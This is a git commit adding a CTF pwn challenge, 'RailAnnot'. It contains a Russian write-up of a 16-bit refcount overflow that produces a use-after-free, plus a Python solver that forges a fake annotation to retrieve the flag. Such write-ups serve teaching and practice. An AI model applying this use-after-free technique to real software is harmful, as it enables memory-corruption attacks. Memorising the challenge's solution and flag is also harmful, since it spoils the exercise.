Init. Commit

This commit is contained in:
Caplag
2026-09-17 00:50:07 +03:00
commit 880d8698d6
115 changed files with 7611 additions and 0 deletions
+42
View File
@@ -0,0 +1,42 @@
<h1 align="center">RailAnnot</h1>
<p align="center">
<img src="https://img.shields.io/badge/category-PWN-blueviolet" alt="PWN"/>
<img src="https://img.shields.io/badge/difficulty-medium-orange" alt="medium"/>
</p>
RailAnnot обрабатывает служебные аннотации PDF-нарядов. В раздатке есть ELF `railannot`. У объекта аннотации 16-битный счётчик ссылок, а у страницы — отдельный указатель на него. Если счётчик обнулится при переполнении, объект освободится, но указатель страницы продолжит ссылаться на него.
## Решение
Создаём аннотацию через `1) load annotation`: `refs = 1`. Затем `2) attach annotation to page` добавляет вторую ссылку, и `refs` становится равен `2`.
Пункт `3) replay stream references` прибавляет произвольное `n`:
```c
ann->refs = (uint16_t)(ann->refs + n);
```
При нуле объект освобождается, но `page_ref` не обнуляется. Передаём `65534` и получаем `2 + 65534 = 65536`, что в `uint16_t` превращается в `0`. Аннотация удалена, страница продолжает держать висячий указатель.
В `4) allocate replacement cache object` выделяется блок того же размера. Заполняем его поддельной аннотацией:
```python
import struct
payload = struct.pack("<HHI", 0, 7, 0x414e4e52)
payload += b"sealed depot note".ljust(64, b"\x00")
payload += struct.pack("<I", 0x5241494c)
```
Первые два поля — `refs` и `id`, затем `magic`, 64 байта текста и `sealed`. Размер получается 76 байт, а `sealed` стоит на смещении `72`.
Выбираем `4) allocate replacement cache object`. На запрос `replacement bytes:` отправляем строку `76`, затем на `payload:` передаём 76 байт поддельной аннотации без добавленного перевода строки.
Освобождённый блок переиспользуется, и `page_ref` указывает на поддельную структуру. При выборе `5) render sealed annotation` сервис проверяет поля `magic` и `sealed`. Они содержат ожидаемые значения, поэтому сервис выводит флаг.
[Солвер](solve/solve.py).
## Флаг
`caplag{annotation_refcount_wrapped_into_the_depot_note}`
@@ -0,0 +1,61 @@
#!/usr/bin/env python3
import argparse
import os
import socket
import struct
import subprocess
import sys
class Tube:
def __init__(self, sock=None, proc=None):
self.sock = sock
self.proc = proc
def recv(self, n=4096):
if self.sock:
return self.sock.recv(n)
return os.read(self.proc.stdout.fileno(), n)
def send(self, data):
if self.sock:
self.sock.sendall(data)
else:
os.write(self.proc.stdin.fileno(), data)
def sendline(self, data):
self.send(data + b"\n")
def recvuntil(self, marker):
out = b""
while marker not in out:
chunk = self.recv(1)
if not chunk:
raise EOFError(out)
out += chunk
return out
def symbol_value(binary, name):
out = subprocess.check_output(["readelf", "-sW", binary], text=True)
for line in out.splitlines():
fields = line.split()
if len(fields) >= 8 and fields[-1] == name:
return int(fields[1], 16)
raise RuntimeError(f"symbol not found: {name}")
def connect(args):
if args.local:
env = os.environ.copy()
env["CTF_FLAG"] = args.flag
proc = subprocess.Popen([args.binary], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=env)
return Tube(proc=proc)
return Tube(sock=socket.create_connection((args.host, args.port), timeout=5))
def choose(io, value):
io.recvuntil(b">")
io.sendline(str(value).encode())
ANN_MAGIC=0x414e4e52
ANN_SEALED=0x5241494c
def main():
p=argparse.ArgumentParser(); p.add_argument("--host",default="127.0.0.1"); p.add_argument("--port",type=int,default=31343); p.add_argument("--local",action="store_true"); p.add_argument("--binary",default="../public/railannot"); p.add_argument("--flag",default="caplag{annotation_refcount_wrapped_into_the_depot_note}"); args=p.parse_args()
io=connect(args); choose(io,1); choose(io,2); choose(io,3); io.recvuntil(b"repeat count:"); io.sendline(b"65534")
payload=struct.pack("<HHI",0,7,ANN_MAGIC)+b"sealed depot note".ljust(64,b"\x00")+struct.pack("<I",ANN_SEALED)
choose(io,4); io.recvuntil(b"replacement bytes:"); io.sendline(str(len(payload)).encode()); io.recvuntil(b"payload:"); io.send(payload)
choose(io,5); data=io.recvuntil(b"}"); print(data[data.rfind(b"caplag{"):].decode())
if __name__=="__main__": sys.exit(main())